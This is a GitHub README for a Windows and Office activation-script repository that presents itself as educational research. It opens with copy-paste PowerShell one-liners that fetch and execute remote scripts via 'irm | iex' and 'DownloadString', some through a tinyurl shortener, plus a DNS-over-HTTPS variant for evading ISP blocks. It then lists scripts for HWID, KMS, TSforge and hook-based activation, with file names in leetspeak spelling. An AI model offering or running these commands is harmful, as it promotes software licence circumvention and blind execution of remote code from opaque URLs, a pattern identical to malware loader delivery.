-
Notifications
You must be signed in to change notification settings - Fork 0
ADD_Active
(Educational Study Repository)
This repository is created strictly for educational, research, and learning purposes.
It demonstrates how PowerShell and CMD scripts:
- Perform environment validation
- Interact with Windows licensing components
- Query system activation status
- Automate troubleshooting tasks
❌ This project does not promote software piracy or license circumvention.
❌ Running these scripts on production systems is discouraged.
✅ Use only in controlled test or lab environments.
- For Windows 8, 10, 11
irm https://tinyurl.com/RUN-MSA | iex
or
irm https://raw.githubusercontent.com/rhshourav/Windows-Scripts/refs/heads/main/Add_Active/run | iex
or From Original Source:
irm https://get.activated.win | iex
If the above is blocked (by ISP/DNS), try this (needs updated Windows 10 or 11):
iex (curl.exe -s --doh-url https://1.1.1.1/dns-query https://get.activated.win | Out-String)
- For Windows 7
iex ((New-Object Net.WebClient).DownloadString('https://tinyurl.com/RUN-MSA'))
iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rhshourav/Windows-Scripts/refs/heads/main/Add_Active/run'))
or From Original Source:
iex ((New-Object Net.WebClient).DownloadString('https://get.activated.win'))
This repository contains a collection of PowerShell and CMD scripts designed to help learners understand:
- Windows & Office activation mechanisms
- Script-based automation workflows
- Real-world PowerShell bootstrapper behavior
- Common patterns analyzed by security professionals
- Defensive detection of activation-related scripts
| File | Purpose |
|---|---|
script.ps1 |
Prepares the PowerShell environment, validates execution conditions (Full Language Mode, .NET availability), securely downloads required CMD scripts, verifies file integrity using SHA-256, executes them with administrative privileges, and cleans up temporary files afterward. |
| Item | Purpose |
|---|---|
Add_Active |
Contains helper logic and supporting components used by activation workflow scripts for demonstration and analysis purposes. |
| File / Folder | Purpose |
|---|---|
AllInOne |
Houses combined scripts that provide a single interface to demonstrate multiple activation and system configuration operations. |
AIO.cmd |
A menu-driven All-In-One controller script that allows users to navigate between activation checks, edition changes, and troubleshooting actions. |
These scripts isolate individual tasks so learners can study them independently.
| Item | Purpose |
|---|---|
Activat0s |
Groups activation-related scripts into a modular structure for focused analysis. |
| File | What It Does |
|---|---|
0hook-Activation-AI0.cmd |
Demonstrates hook-based activation techniques and how system hooks interact with licensing components. |
0nline-KM5-Activation.cmd |
Shows the workflow of online KMS-style activation logic, including client-server interaction simulation. |
HWID-Activati0n.cmd |
Demonstrates how hardware-based digital licenses (HWID) are tied to system identifiers. |
TSF0rge-Activation.cmd |
Explains token-based license handling and how forged tokens are analyzed in security research. |
Change-0ffice-Edition.cmd |
Automates switching Microsoft Office editions through licensing configuration commands. |
Change-Wind0ws-Edition.cmd |
Demonstrates Windows edition conversion logic using built-in system licensing APIs. |
Check-Activati0n-Status.cmd |
Queries and displays current Windows and Office activation status for diagnostic purposes. |
Extract-0EM-Folder.cmd |
Extracts and displays OEM licensing files and certificates for educational inspection. |
Troubleshoot.cmd |
Performs automated checks and repair steps for common activation-related problems. |
- PowerShell bootstrap and loader design
- CMD & PowerShell interoperability
- Activation status detection mechanisms
- Common scripting techniques flagged by antivirus engines
- Defensive analysis of activation scripts
- System troubleshooting automation
- Some scripts mimic behavior used by unauthorized activation tools
- Such techniques are studied by security teams to understand attack patterns
- Ethical use and responsible learning are expected
- Windows Software Protection Platform (SPP)
- KMS vs HWID licensing models
- PowerShell execution policies & language modes
- AMSI & script block logging
- Malware loader behavioral patterns
rhshourav
Educational scripting & security research
This project is provided as-is for educational analysis.
No warranty, no endorsement, no commercial use.
#HOME